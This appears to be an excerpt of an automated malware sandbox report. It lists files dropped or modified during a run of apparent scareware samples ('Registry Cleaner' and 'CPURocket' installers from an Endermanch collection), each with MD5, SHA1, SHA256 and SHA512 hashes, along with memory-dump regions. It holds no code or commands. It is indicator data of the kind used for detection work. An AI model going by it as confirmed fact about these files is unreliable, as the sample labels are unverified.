| SHA256 | aa4285bf4634ffd05863cf121b930320541e42fdbc1ccc2d7d5a6254279103a9 |
| SHA512 | 6e4eddb48f7f228fe22e3ca2ce7ddd34e5c73afd894721d99bfe7a8bc47599902b450dd1ee186a3e9c26ecaabb9fa44bed6acfe3e5275b9f94c4123fff102d6e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\AlternateServices.bin
| MD5 | fbc5b354f5a1c87a77631325e509b827 |
| SHA1 | e08251e230e624d3a32e9dbf5c9c772887c5bb88 |
| SHA256 | 1f3eecc44ec20b90388eaaec65cbde806503e1f262c551fa5c27a934fd15b812 |
| SHA512 | 6c3339904812acbdd83a56ac31c1d01312fd07d972392b3c2cbc6e7352fd66eb6ce7e23ae4c578ad5bef899bdf1e516ada2fda5d31dee6234f38a0453b63469e |
C:\Users\Admin\Downloads\7z2407-x64.dWdiufYS.exe.part
| MD5 | f1320bd826092e99fcec85cc96a29791 |
| SHA1 | c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed |
| SHA256 | ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba |
| SHA512 | c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a |
C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier
| MD5 | 2129bca1bf0156fb4b3449a4ac86f163 |
| SHA1 | ebf76840f11c92eaa36331b5577b358f836436c9 |
| SHA256 | f16adbb41204975e2fc77e8fd529014a971acb49efe3aece5ac60c093197db5e |
| SHA512 | 926f18a86c752a8df7bce4a4455643d13aae9bb5e8ab15d681f6236b72b0393a871a0aa9dc3ad6223bc1a9e1779adb989d68c1615d7e2b6b02fe38bccd5967ba |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 5f95b53601fa5032e673b79dc1c72d3c |
| SHA1 | 8803974b34b35f773c52ab8a46002be3f767c6b5 |
| SHA256 | 704978577a5b5e6dda9d16c91a98b2715252acd9f99876fffab26b5a6ad3a595 |
| SHA512 | 0b4795cdd0c425bdf1259dbe04a95616b295373c2f3cddc2247d38e83c7c4145537c71bd85dbd7ec89ae43fb1c5e790a703cf70967615df4c418aa83ece14582 |
C:\Program Files\7-Zip\7-zip.dll
| MD5 | 8af282b10fd825dc83d827c1d8d23b53 |
| SHA1 | 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355 |
| SHA256 | 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca |
| SHA512 | cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8 |
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 79e8ca28aef2f3b1f1484430702b24e1 |
| SHA1 | 76087153a547ce3f03f5b9de217c9b4b11d12f22 |
| SHA256 | 5bc65256b92316f7792e27b0111e208aa6c27628a79a1dec238a4ad1cc9530f7 |
| SHA512 | b8426b44260a3adcbeaa38c5647e09a891a952774ecd3e6a1b971aef0e4c00d0f2a2def9965ee75be6c6494c3b4e3a84ce28572e376d6c82db0b53ccbbdb1438 |
C:\Program Files\7-Zip\7z.dll
| MD5 | 0009bd5e13766d11a23289734b383cbe |
| SHA1 | 913784502be52ce33078d75b97a1c1396414cf44 |
| SHA256 | 3691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129 |
| SHA512 | d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 760a228deca77332bbc1305b0fddbfbb |
| SHA1 | 682ade6de991689fd3cb2a5a91bdc9f546e37807 |
| SHA256 | 1e465353dbf56462268556211a9ff3b96805b20569710ed010396a974e570138 |
| SHA512 | 0bf5609922b9c01976ec07ba947625f51cfadaa4e9689566ecbae54545cacad604e3167f4c9733334a0e04381f9d88c7e9bc7610a1de5ef3ea5f8e675f9e744c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | bb71357df339f9fa7997c7d5e9dd519b |
| SHA1 | a9b762f44ca22bba1877386924054e3b4b3a121f |
| SHA256 | ac8f90654b78f1027539abb02dc11bfd803224bf3b03320ba6aad771e58cce8b |
| SHA512 | 46ecb33b367be1318729c084d00543b78371eb523bcceb0428c1ebd7cfa2c7740c1d2776d2db661e1291df144f7a6ecaad3e589b29d1e1fb3544cabfe8461996 |
C:\Users\Admin\Desktop\[email protected]
| MD5 | 1f1d7b92e00983a27f1b19638c23aa52 |
| SHA1 | b6a0c7cc383a6134924ff55605f7d80db49a4da2 |
| SHA256 | e6411ae9f2dc1ce2d9932d5380552de1ca0f89e21f725ae4e4e7c882adf76b9f |
| SHA512 | 4b7f91a12d87991a6dea90bd69f401bdce727f89ee22d3a57e7ba95f9d488689b9ec625dde0ac5dd914e2592b4732dbb657107b5b4e88251b7cc93814d8ee214 |
memory/3400-3847-0x0000000000400000-0x0000000000413000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp
| MD5 | b02d341610c254fc7ecafe4147ec5571 |
| SHA1 | e69745d27265ba283dae19be2f81db37df39ce30 |
| SHA256 | 3c3887c918c3a4cf1ff482842c937ba4564ae8d2983413581e93ea2bf1812a6b |
| SHA512 | f3c12f8532b73f5691bb7f64555a234ba881213e427ea4890286b447e014b7d13a48e3815c8f786639eb52bc4011ddec9ba87c18cae103b1f7d761002cff4d31 |
memory/3400-3856-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2768-3857-0x0000000000400000-0x000000000049D000-memory.dmp
memory/2768-3859-0x0000000000400000-0x000000000049D000-memory.dmp
memory/2768-3861-0x0000000000400000-0x000000000049D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKPH6O3ECVNYBQ1W6MPG.temp
| MD5 | 135e435a921cc5ee6c365a990aa96f5e |
| SHA1 | 70c4b34319d30c1b471e61baafa41181cc7764da |
| SHA256 | 94c48fe569793528b45fb8f327ceb88c6c077e7e825b2158a5aa3ac01bfdeaf4 |
| SHA512 | e4d7bb639e149fbe9ceb83eb4faea6f72693b6c564645ba796b0a0774f6b79670409bda747e62f0b1715859243e099e50fb0cf17b20fd59b8e904c826e5eff81 |
memory/2768-3891-0x0000000000400000-0x000000000049D000-memory.dmp
memory/3400-3892-0x0000000000400000-0x0000000000413000-memory.dmp
C:\Users\Admin\Downloads\RegistryCleaner.Wca7GPNr.7z.part
| MD5 | 7588b8c415ee78b80da1145ccdb28650 |
| SHA1 | a77e32746e0715b91b3cfda37a6484baed557adf |
| SHA256 | 4a828a1c5654f97854321d10c09c14e1038416e402198a2758e98fbbe99f69aa |
| SHA512 | b1f6ff7947e421a1129cc1ac5b175cceef346b5d8b2ed95ec60b1afe3c14f949254ea7724ed70a079aa14ceeb4350c15f566b19c15cd2d3256a92b75edad27e0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 9b03b50d25288c775b6c0fc853f15b4d |
| SHA1 | e9d9cd13d439abb646de7738f254f7354f78e431 |
| SHA256 | e383c2848748db059fe3243908db7f15b0dba3014c30c3884b58f8dc363077e4 |
| SHA512 | 88aa4f6f1fb53573b7f89197c1dab175c475d3f461435a4a52d7e54bc2b5c801943e804d0446a292728210673cb303857d1f15093a1726abe65cd69dce48395c |
C:\Users\Admin\AppData\Local\Temp\7zE896B600C\Endermanch@RegistryCleaner_HOI.exe
| MD5 | 68f4424274c9d32143cdffc80d5b8b2a |
| SHA1 | 9f9d225ff4c38fbf48d31dbefd54c3a4d08b0acb |
| SHA256 | 3f9285a35db59170b643e567ab72b6cb988a9cc6b496d755bd1d002c702e3996 |
| SHA512 | cea105aac860b86c795c32544b34e26db2f1a0c4a4f243434d5a939fe37daffb93d0739562bb48d08bcf1d187d9275ff88f4b1bc943d466289db9db4cf0a5f74 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js
| MD5 | b537aad54f6b0b38d1edbf5f6a25c0bb |
| SHA1 | e02e3d73367bf20750da8e57b692865565608449 |
| SHA256 | e56a6b37867309e3d078b5ea0a78e99c25bf80e06558632e4070a4f6c70f2fa2 |
| SHA512 | fe1fc798662ed55f4e0ffd6b43b6f1bc58684f583b8d25302f06be32e77f76a1958a7b15d3fd7e590d6e94f6fb8d08d51c21409fbd7030920c41d661d9655914 |
C:\Users\Admin\Desktop\[email protected]
| MD5 | f6e05610d1ebdbddc3b1bc3fa3818513 |
| SHA1 | 26ba26611d7f6f75422ee3c0a54782c25cf931f5 |
| SHA256 | 11bb079e0fe52abd4c3d09a8bc6b59444c57f2bf75894539c14402cd8a094378 |
| SHA512 | aef89bccc866ce3f9cb429b9c4ef63e7bb6bfe374ad9bd9126f23bbaaab43332a76abc38f1aea7d5fc83cb06d733dbb3e536abd2aeb08670925c56bc135c31d1 |
C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp
| MD5 | 0a8ad7de0afc794c795bb2eee08802aa |
| SHA1 | 8fb5466177e69993502d3990234281c826077193 |
| SHA256 | f016d3daadb81ad636290f98b92212daa2b8cdecf58d694ac6760a6165a19135 |
| SHA512 | 1974255f5fcf01af17821708ef80827e28e24a7ad2da60846f2e76ab85eca29b59735b916decd4e90a7eb071b2ff0dd38e799acfab9e7aaeb5d09f1e00fab60d |
C:\Users\Admin\AppData\Local\Temp\GLC8DB1.tmp
| MD5 | 7b4571f62cac828b19e77d2a048a3501 |
| SHA1 | f1a20a73802d437882596e11a8478ac67951cd73 |
| SHA256 | 6a21254f3840e3029598a7fd018f685772646a9f657ce13d98a6af8e76915626 |
| SHA512 | 29f4ec3e46a91dd57b3328c1744eba5e4cd8f48bf9b91328bc89692d0cb722e9b84516d9854b17b98ff8ea8604f07fbc81afe9ae0ccd59afdb74a4692d546e37 |
C:\Users\Admin\AppData\Local\Temp\GLK8FB7.tmp
| MD5 | 3df61e5730883b2d338addd7acbe4bc4 |
| SHA1 | 03166e6230231e7e3583cf9c8944f4967aa1bf1b |
| SHA256 | 2efe9a54c8eb878711d9b6cd18f276838645aff52fe69d8a864376cb258ec616 |
| SHA512 | 36e9d705d22dad3d952b4da578a990f2b63ec2f9fbf2734efdaea9ecbd4f07a8d7232792eb5bdd81c553354d51334993cb6103c377f3483a680eac9e41cd2087 |
C:\PROGRA~2\REGIST~1\UNWISE.EXE
| MD5 | 443e13846997c537e8f5ed61130ab705 |
| SHA1 | 6b10d458a5f1e3dbf8dfa96b118cf232d3a66f5f |
| SHA256 | 49ef36bd01b8ebf38c7b807a5fb44cbaf47c9d4efa883b01c41494c61ae4a2e2 |
| SHA512 | dd994d001f7de591cd03a7d875ec0a96be0dbf31ee7c2508ab67c701a27bdebdcb14dffd7f971f2dc5b86bb44443e4816880d73cacf7974b1731078a841fddb8 |
C:\Program Files (x86)\Registry Cleaner Trial\UninstRegclean.EXE
| MD5 | 697f989f612b75e059e0ca4b01b27936 |
| SHA1 | a7b034fe8ff001a0ab72b255d3759648258593d9 |
| SHA256 | 45021af7002fb2788944cbc9c7811149ca73f1f1d5f96b3fd04d54df3dd12d24 |
| SHA512 | c63b8794071aee38ba71e7f7da6cc29c9f0ec673abe7e32f03792380f50202ce31114bacf35999fcbf9176a11340a58cd83884fb2e0de7b1c5f523cac96c53f1 |
C:\PROGRA~2\REGIST~1\soref.dll
| MD5 | b913cfe476f93e11b7bc5d5115b33680 |
| SHA1 | b7e4735b18f5916e25d0c9ca29fc2bc2cd0b8340 |
| SHA256 | 2da6aebed8590372212804a75ad10d7462dd9cf4a80bdc2240e208715ff2f473 |
| SHA512 | f53d361b9642d5f929e7670ea442f6fb73e7c2c62a8d8290891b05b2086c7c1dac1f41363d818f2a140c21f04f1fd21e9c745a93b4bd4ee3654819cf7caba3cd |
C:\PROGRA~2\REGIST~1\~GLH000b.TMP
| MD5 | 4132886ba9273cdf7d53464ca1120c41 |
| SHA1 | 3ce17bb3783bae388adf9daa9d269edc7993bb30 |
| SHA256 | 33c07d7b5e03f373aeac277d018c898b41a3bee24ac79567988c3b5717fcc1bc |
| SHA512 | 17c6a8c134e3164c033addb7640acec7e519e7ac6c247ed8b1653277a940ef1df64e73a40a1f5551d421b0c3a7d7054761207b622e9ec6b5211379b387fddc0f |
C:\PROGRA~2\REGIST~1\~GLH000d.TMP
| MD5 | e1d12da2c612e53849e53c8aec1fad5a |
| SHA1 | 76a88d458350c2ba193eee28584c9ea8eb010150 |
| SHA256 | c5119edf381f590903faaa2663609e1cad93923626aeac6cb44611ab3746cd86 |
| SHA512 | 1ed38cbd3bc036d615d476efe85124691720b54995c7f7d69a620937ff35285a46b70aa74c321f87378605ac5689f4e6b83261c7c074a1be2a745764bc0d2b1e |
C:\PROGRA~2\REGIST~1\RCUNIN~1.EXE
| MD5 | f38ffacb3b348c4ca648fcbfc2543240 |
| SHA1 | a0b283f12ca615efef71f9f6c925b0e1a06ea191 |
| SHA256 | 25a54fa88ba98bb0268d94311f4223f8684e9873219c0ddb55e8d4b4f449e642 |
| SHA512 | a54090e5793db33a791666befae292bbd5b7362aa94a5923f17dbfff7282437912d2d0c99c4b772d73e4fb3807331acc289240a3bfaddaeb76b947ba3da81dbf |
C:\PROGRA~2\REGIST~1\~GLH0010.TMP
| MD5 | 243b39d8b0d032382b978b015c32371e |
| SHA1 | c6e8b1d4e20be0d46c2c02146f5f6607a100e49e |
| SHA256 | 7210ffb3d71cca681baf3da4bb976bfd5838bbf442b908b169f3235be6fc8e8b |
| SHA512 | 87f5cfcfb5a5ab27299520e2689422568ad307f70d067507a336263b7a2a022a622a1c5fed9ef9466ef5a2db2f74d773689bf588f776ead7eea8495d9917db60 |
C:\Users\Admin\AppData\Local\Temp\GLF997E.tmp
| MD5 | b9b41e50d612e00bf3a49a6405b89d74 |
| SHA1 | 88063ee643c64f18fedda1890c717122634aedfd |
| SHA256 | 50e7a30e1825fab93b94b698c2c6d2cc1787b094c6cee53eeed5c497f77443c9 |
| SHA512 | b2486f526025095adc6767b5c2f85f80446db2b586e4dff376d74d44494f16d78a361dc944f3a10d8ad494b871a190e8c3f0e92eb27114be5d0b748e0da9c1ca |
C:\Program Files (x86)\Registry Cleaner Trial\~GLH0011.TMP
| MD5 | f07a8626ed507cd4fffa0d82ff3ed49e |
| SHA1 | 980f7b153b1455a363960863729dad28dd1701cd |
| SHA256 | 99ac2e2d0edefa546c1cee10b6a3bd62d283242e0ffe6c4b1d5ee48872b65469 |
| SHA512 | 5978772b772f2b8d64669385d55cff14f66fd33c2c6142dac35b83bd7259d556e8215f398b6dcdaf4c5da9e422f85480a92b8e4da746aed487e64f63abaafe8e |
C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp
| MD5 | 6f608d264503796bebd7cd66b687be92 |
| SHA1 | bb82145e86516859dae6d4b3bffb08c727b13c65 |
| SHA256 | 49833d2820afb1d7409dfbd916480f2cdf5787d2e2d94166725beb9064922d5d |
| SHA512 | c14b7ec747357c232f9d958b44760e3a018df628291e87de52b8174ccc4ada546eba90a0e70172d1db54feca01b40cd3aeaa61b8a2b6f22d414baad1f62e8e54 |
C:\PROGRA~2\SOFTWA~1\soproc.exe
| MD5 | ad33ea09b22a376be3ec32ae660e3c4e |
| SHA1 | 65f09c1e804a193ccbb8aa28d064081829b034f8 |
| SHA256 | c1d329d5d43f445e40d989dce9fc86f89ff4a8d167403dec4a8da715b636b735 |
| SHA512 | da49fb4a027c8530bb3e5c8d16d699d80a2d1dc5d0cad22e216034b8d8db9f1ba09cb3d7b0b29ed89d07c153313c3b0621a947bc86af85e3a57c749d3f0ffc62 |
memory/2864-4225-0x0000000000B80000-0x0000000000BC8000-memory.dmp
memory/2864-4230-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4239-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4244-0x0000000000B80000-0x0000000000BC8000-memory.dmp
memory/2864-4243-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4242-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4241-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4245-0x0000000000B80000-0x0000000000BC8000-memory.dmp
memory/2864-4247-0x0000000000400000-0x0000000000989000-memory.dmp
C:\Program Files (x86)\Registry Cleaner Trial\License.rtf
| MD5 | ae5cc1d4984ed9771777602028ba68cc |
| SHA1 | 2cf663b71b59fe63152d066c44bf8481a12ed076 |
| SHA256 | e696ed198a36a237ef4f2cbd4d6510e2e25c3e65ba8ba163f7a07185de219140 |
| SHA512 | be4978ba633671043ffdce1fc5e206254ae0d4f18ee14a087f9da7df4577468a69ef93db432458b6497fdaa72c485ed03ec365dbe536cdd00d84af35e9077c33 |
memory/2768-4372-0x0000000002540000-0x0000000002588000-memory.dmp
memory/2768-4377-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4380-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4382-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4384-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4385-0x0000000002540000-0x0000000002588000-memory.dmp
memory/2768-4383-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2864-4386-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4387-0x0000000002540000-0x0000000002588000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 51799568dacd0c57809858dc8c7c33e8 |
| SHA1 | 07b07d7124c1789912866ec9feda6c38f51e8bc6 |
| SHA256 | 228641c35fc0c2e538a2c16d143bafe2e8e99be6b5cfb397f887c91c3d604ca0 |
| SHA512 | 126bdf9f57db58ca0e4a43500dfc7f60420b86c13991da6d711bcef43f4629afb8a7ffae8ecdc15ef7a37a94896431df1712f06a8b6e4704b011d838a9a8be63 |
memory/2768-4406-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4423-0x0000000000400000-0x0000000000989000-memory.dmp
C:\Users\Admin\Downloads\CPURocket.cbdg2AQN.7z.part
| MD5 | b6a1c3dee30ae984547a08ba85b1ffbc |
| SHA1 | 7d6b6f2d114ce86ed8c2814ad4c920b5051eb98f |
| SHA256 | bd99aad600f97f7ae57f5f3b813b3d981d5b6d7c49e90a3b1216b3d5b4e4a51b |
| SHA512 | 5d0dfa99fdb2639603e4c2756b36ce4265d9641c486db0671ae2d3bace52c58ee77047d317fa5aeebbc389c5f6f3d410fe8a96bd86e877834978e72aafd185e2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | f05827ce27ec77784c139c53cda52e5e |
| SHA1 | b468b5272ba1d7930c43e39cb7beb5c2238b688d |
| SHA256 | abd609db5c4923218a4a279b7c09f66ada773c71801c53f35add39f125df0c7e |
| SHA512 | d2e707509caa228bcc60833ab76928d5ea4310b63752d9d6ac61f1d4a9efb4619a50c93f497f30067c240763ea552e6c0c5f7adffe30dff4a882c4285194558f |
memory/2768-4454-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4455-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-4461-0x0000000000400000-0x0000000000989000-memory.dmp
C:\Users\Admin\AppData\Roaming\Registry Cleaner\Backups\2024-08-09,23-46 03 880.zip
| MD5 | eb0fd69615cde99f23100ebb60f554ac |
| SHA1 | 70cd9f404e3a8ddf08d0eb721e77e46764826af5 |
| SHA256 | d1bcf2631b220182c9e5da2ea9764d4ed0f648a80c2c7a3e0ad68940b51698bf |
| SHA512 | 7ba427700c9be06bed6118c078a45b0fdf148eb6c524feb9676bbf71666a706a4c330d6b4c5cb020c92ec5c08eaf31a311eab961d3440b5e0ff46dea53461ffb |
memory/2768-5154-0x0000000000400000-0x0000000000989000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\GLF3849.tmp
| MD5 | 26c35a28f01c012e8f021a9b2c02e006 |
| SHA1 | 661b9cad3295d6efc9ba2f648881b9f45d94f66d |
| SHA256 | 0828ad31b93e50abc4ff6233d422caf7ff1e1153dc198970f43ae69a9fb149ef |
| SHA512 | 404e067828ffb3455725737a98bf85532b3eea377118e6889465b1d141bb62c194f6b3b44a07f4a4c978ddf48bcb326cf3a623d560c88920c35470d17f381756 |
C:\PROGRA~2\CPUROC~1\SOfsg.exe
| MD5 | 840da1f353e8e255e000645b7145c18d |
| SHA1 | b8561507d08ba0ee2ca0a48a9805131e72fa216e |
| SHA256 | e095d9599dc08e313c1f8c34e9ed2a827967aeedcd18ca840839a9a9c15647eb |
| SHA512 | a892c415ee238e83ad86ad3f495203e7fdf4bebcf0e9653b1fb551fe40b776471fa69785d29ecef85437501b16e2cbb2805c44dc6275c6a656108a65ff52cbb9 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\MTTOPB~1.JPG
| MD5 | 4fb2c7cd08850f78395bac08979a0480 |
| SHA1 | 818311acbab9922efb7f27185b7a66c751ee02d4 |
| SHA256 | d19987dd74c7229f05fae11afb1c5676255eec2893927bc85bece1f70cf37946 |
| SHA512 | 950c266343b6f02f62c4915d9ef65522da7dd770e15ffc554a5d42f9e96952d0aa4279351e4ee6964a8d0d2489f2ae7e06d067545ce2c1c91ed774297be7a445 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\index.htm
| MD5 | c317eeb45cde7bf108afa79b7e9c2b5a |
| SHA1 | 7ea4377165bc2ec0f2304aa7c7c2a4c39190bb76 |
| SHA256 | 230cec4157ff29171b4caa29485d5239d78023a6ac3a413f19867017fbba9307 |
| SHA512 | 000e4bbadd4c8e124df6bcee1bb8373672fbada4b9c2652a4ada48914695acc816209d24eca4e87d9c08693e62a0f7d6979f860dcd60f6fb2cace623ffe63822 |
C:\PROGRA~2\CPUROC~1\CPUROC~1.HLP
| MD5 | 0b090541c3234ea7943de8819e44a28e |
| SHA1 | b09383a564bd5a708c479fd9f19d12bc73ddbe46 |
| SHA256 | 9c81c60399ced14875ef5a3c9a1dc649837326c549850a29140bfe87b536aa12 |
| SHA512 | d216dc68f5416d13bf1c4f1277a8abcbff34f437934f099c6329358456edb094346b8fda51f9a8e46fa1933bcc162ad5dd6e1d1b2532ae3b1c234c04fd90e76e |
C:\PROGRA~2\CPUROC~1\CPUROC~1.DLL
| MD5 | 5eec876ce6d83e4f0cbf415d8138a8a8 |
| SHA1 | 2008830cfbfee2ab8325050a853c90b3e4287bbf |
| SHA256 | 692ed3aa45749b3ca1e6f484e2a956f32c102df6ad591d23aaf1fade8494256b |
| SHA512 | 7743b4b4a54cc43878cab872e634a9af0bb9e5d523dc561dd4508cb31ebfe19cafff4c04654e3b68eb12df0e2293e674431222349f674d1582d3805dbba2b5f3 |
C:\PROGRA~2\CPUROC~1\~GLH000e.TMP
| MD5 | 132b5cf6e15b342312f917deb9521f63 |
| SHA1 | 0287e368be5d0605ef7350cca1e33b3e390f6a6f |
| SHA256 | cc8ab5d05e0db06aedca77e8201d6d031626e48e41751764727c776692b4b847 |
| SHA512 | d9172fdc4559a851c45aa17194f60ae634954765741f8c15d496181275feb03a19d9f40651f4db620824bfecfa45b44f92efddd9af23d6ff2e736fb5a1a5701d |
C:\PROGRA~2\CPUROC~1\CPUROC~1.CNT
| MD5 | c69a8cd4e1ab29f33a7953fa4eab7335 |
| SHA1 | 307ab0b167ae67b5744595f697c22e56595485a3 |
| SHA256 | f1325b6e54d74fa08b1d2132a4da7a2af91d70975eeb51117d2723a6e4ba46f3 |
| SHA512 | 79e859c4dfaffe464f11adad16b953dc6a3bb244cd875878fe0b4618b9d83b92cb0ede6edaf43ff98b4af5b95094ceac11e147c0597abb6dbf0f1ab3121998b2 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\logo.bmp
| MD5 | 57d3ee18fa7d8ab6a3b7720ef5a68126 |
| SHA1 | cea84a6102ee79933ce54618ec32c2a67ea780b2 |
| SHA256 | 7b4302a4bb115766b149723c5cd708f689f5bf960dbcd3a330cacee5840f83b0 |
| SHA512 | 37f1f91fce3361f09c2c88e8f3b1e5509bc730e196df869db9fb87892e4081d3d03d002b40483151c642aab2d823f92b9f9191d1ec30d921f6e20aaf001fe262 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\upgrade.htm
| MD5 | f858300208fbfc9b5977e86d50807ef5 |
| SHA1 | d5978a3d65a9f508bd9d2bd42494ea29c62d5b5d |
| SHA256 | 784066b4db56dd9a717b8a6adf1af506ca649803704a1a772c5f18c755c15aa4 |
| SHA512 | e6df23abaa5ba83b6f9986f2175c4672687dfcbd4bfc59e1d116d881aa28b84a1fc522f821fcfc4ce05cd7efb188b9b465d177177176c76225d93d81d0f4e446 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\mtscreen.jpg
| MD5 | 35069456fe4e5a68f21de224abb65a66 |
| SHA1 | 7f1ab2cb647b5cfbefe263f570dab871ed1caafb |
| SHA256 | 7fdcd33997fc27c922b4ba755884d6a7db0f40b96650c98399157cda748208f6 |
| SHA512 | bca03948da85be4123cc20b7b98f2da5874ab80bad7e1fff99709bf85bb915f7519b517cea606e2df0685d728d0b9a0a4ab64ff5e3ebebfb8855d5d9edfff415 |
C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\TOPBAN~1.JPG
| MD5 | 943ba1ba412ddf14b5c6ec1ce84e1320 |
| SHA1 | c6e6426fd19f5ca5476cc14e7ceeff864097889a |
| SHA256 | ad884e044a2ceecd54d6a64a88696341f67319d9e0bb0cfc8e5739b5c2de3987 |
| SHA512 | 8ed35534a20ade40718c6ea0e2eaaabab4d546afe25b0392ea955997b51a093be34dacb2709d87d9efeb510856c3fd8d977b7babd826abfb664fa25e0d6658c4 |
memory/2768-6645-0x0000000000400000-0x0000000000989000-memory.dmp
memory/9692-7676-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4272559161-3282441186-401869126-1000\7dc3d09af957e1100b8fb5e8da82deea_e1cb8dfe-5215-4859-82e0-ad3714d680b0
| MD5 | d342e66503a0e5160fb917a2929ae4b5 |
| SHA1 | 93254f90e02984a0630a11d8cfe4aac60cac4ea0 |
| SHA256 | a92efb608732dc7742e7f84fd9364a604a0e600b63872eb8ef82fc715c3bc86b |
| SHA512 | 0c5e13bd542cf1c76a8e4d1de369d380ae3c5e91064d228228e82ba8df912d3fda8d6403a2dd71f2accf880df56acba6a7b7d2243d6d8ac8462304e7ea56451b |
memory/2768-8007-0x0000000000400000-0x0000000000989000-memory.dmp
memory/9692-8909-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2768-9170-0x0000000000400000-0x0000000000989000-memory.dmp
memory/2768-9938-0x0000000000400000-0x0000000000989000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | ca66fc47b84683cd00ff9187d5b7b461 |
| SHA1 | 75b562df09d55d2042f2c479ce07c46d2a916392 |
| SHA256 | c28fd1d9e3b164c6a2ad98fed24de4609a304365b03dd73d7060bc9976fdc8a6 |
| SHA512 | cdbf299128fd9a8f828bf96717073f802611cff7bfcb4a8396ff381136d6b9def76e85f643d4f31a28e3d87470a9b10a92304fc3824f8d9ce19caeb5bf6ea11d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5578283903c07cc737a43625e2cbb093 |
| SHA1 | f438ad2bef7125e928fcde43082a20457f5df159 |
| SHA256 | 7268c7d8375d50096fd5f773a0685ac724c6c2aece7dc273c7eb96b28e2935b2 |
| SHA512 | 3b29531c0bcc70bfc0b1af147fe64ce0a7c4d3cbadd2dbc58d8937a8291daae320206deb0eb2046c3ffad27e01af5aceca4708539389da102bff4680afaa1601 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0487ced0fdfd8d7a8e717211fcd7d709 |
| SHA1 | 598605311b8ef24b0a2ba2ccfedeecabe7fec901 |
| SHA256 | 76693c580fd4aadce2419a1b80795bb4ff78d70c1fd4330e777e04159023f571 |
| SHA512 | 16e1c6e9373b6d5155310f64bb71979601852f18ee3081385c17ffb943ab078ce27cd665fb8d6f3bcc6b98c8325b33403571449fad044e22aa50a3bf52366993 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1a87fd4b287ce44060072c345d369c23 |
| SHA1 | 602b01da868efe2476a5b400e782a9b0d49e2ad2 |
| SHA256 | 3867efc02ad6d4e285bb796e19913e623cf62227418b54f0eac9cd79fbc6b5f2 |
| SHA512 | ba9d55081c36655bfbc03a2baa5d80083efb9821d1989545da5f82a78efad52dfc6cbf4e99c19fdb13c179914d2fb3d20e2b427680d2c446a76a55fe8a8afa0c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3cbd4c6c895f5a31aa9a44faea4a5c47 |
| SHA1 | 35ca908c36b93432e363095579b24c247bb55b10 |
| SHA256 | d7e2a192b86e17729a4905ffc70a25b18e71d9c7bc25ec7c97f3a25454d3ec86 |
